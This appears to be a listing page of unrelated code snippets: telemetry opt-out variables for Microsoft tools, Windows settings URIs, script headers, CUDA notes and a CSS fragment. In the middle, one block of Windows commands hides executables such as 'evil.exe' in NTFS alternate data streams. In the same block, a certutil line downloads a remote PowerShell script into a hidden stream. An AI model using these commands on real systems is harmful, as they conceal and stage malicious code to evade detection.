The following are some examples of the diagrams, charts and graphs that can be made using Mermaid. Click here to jump into the text syntax.
See these links:
The following are some examples of the diagrams, charts and graphs that can be made using Mermaid. Click here to jump into the text syntax.
See these links:
Tool/Service | Environment Variable | Effect | |
---|---|---|---|
PowerShell | POWERSHELL_TELEMETRY_OPTOUT=1 | Disables telemetry sent to Application Insights | |
.NET CLI / SDK | DOTNET_CLI_TELEMETRY_OPTOUT=1 | Prevents sending usage data (commands/ errors/ etc.) | |
VCPKG | VCPKG_DISABLE_METRICS=1 | Disables anonymous usage metrics | |
Azure CLI | AZURE_CORE_COLLECT_TELEMETRY=0 | Stops Azure CLI from sending usage data | |
Visual Studio Code | VSCODE_TELEMETRY_DISABLE=1 | Disables telemetry in VS Code | |
Visual Studio Code | VSCODE_CRASH_REPORTER_DISABLE=1 | Disables crash reporting | |
GitHub CLI | GH_NO_TELEMETRY=1 | Prevents GitHub CLI from sending telemetry | |
Application Insights SDK | APPLICATIONINSIGHTS_NO_DIAGNOSTIC_CHANNEL=1 | Disables diagnostic channel used for telemetry | |
Windows Terminal | N/A | No known environment variable; telemetry controlled via settings.json |
Category | Settings Page | URI Command | |
---|---|---|---|
Accounts | Access work or school | ms-settings:workplace | |
Accounts | Email & app accounts | ms-settings:emailandaccounts | |
Accounts | Family & other people | ms-settings:otherusers | |
Accounts | Set up a kiosk | ms-settings:assignedaccess | |
Accounts | Sign-in options | ms-settings:signinoptions | |
Accounts | Sync your settings | ms-settings:sync | |
Accounts | Windows Hello setup | ms-settings:signinoptions-launchfaceenrollment | |
Accounts | Your info | ms-settings:yourinfo | |
Apps | Apps & Features | ms-settings:appsfeatures |
#!/usr/bin/env pwsh | |
# TAB:4sp + EOL:CRLF | |
#------------------------------------------------------------------------------ | |
# Filename : SystemPath.ps1 | |
# Author : eabase | |
# Date : 2025-06-02 | |
# Version : 1.0.0 | |
# Encoding : UTF-8 | |
# License : CC-BY-SA-4.0 | |
#------------------------------------------------------------------------------ |
Updates for rtl_fm overhaul
Source: Archived version from November 23, 2023
# Version: 0.1 (2025-01-18) | |
# License: MIT, use at your own risk | |
# | |
# This script disables the Lenovo-installed "Tobii experience" software and "nahimic" software. | |
# Tested on a Lenovo Legion Pro 5 (82WM) with Windows 11 24H2. | |
# Run it with `powershell.exe -noprofile -executionPolicy Bypass -File badlenovo.ps1` | |
# Following this script, you should be able to uninstall the "Tobii experience" app from the control panel (appwiz.cpl) | |
# | |
# After major updates, you may need to re-run this script. |
In general, check the crt/host_config.h
file to find out which versions are supported.
Sometimes it is possible to hack the requirements there to get some newer versions working, too :)
Thrust version can be found in $CUDA_ROOT/include/thrust/version.h
.
Download Archives: https://developer.nvidia.com/cuda-toolkit-archive
Release notes for CUDA Toolkit (CTK):
type C:\temp\evil.exe > "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"
extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe
findstr /V /L W3AllLov3DonaldTrump c:\ADS\procexp.exe > c:\ADS\file.txt:procexp.exe
certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt
makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns.cab
#!/usr/bin/env python | |
# -*- coding: utf-8 -*- | |
#---------------------------------------------------------------------- | |
# lunar-lander-3.py - A demo of AI learning for landing physics on the moon, using pygame. | |
#---------------------------------------------------------- | |
import os, sys | |
import random, tempfile | |
import time | |
import numpy as np | |
import winsound |
/* main.css */ | |
header, footer { | |
font: 14px Arial, sans-serif; | |
padding: 8px; | |
color: white; | |
background-color: black; | |
clear: left; | |
text-align: left; | |
} |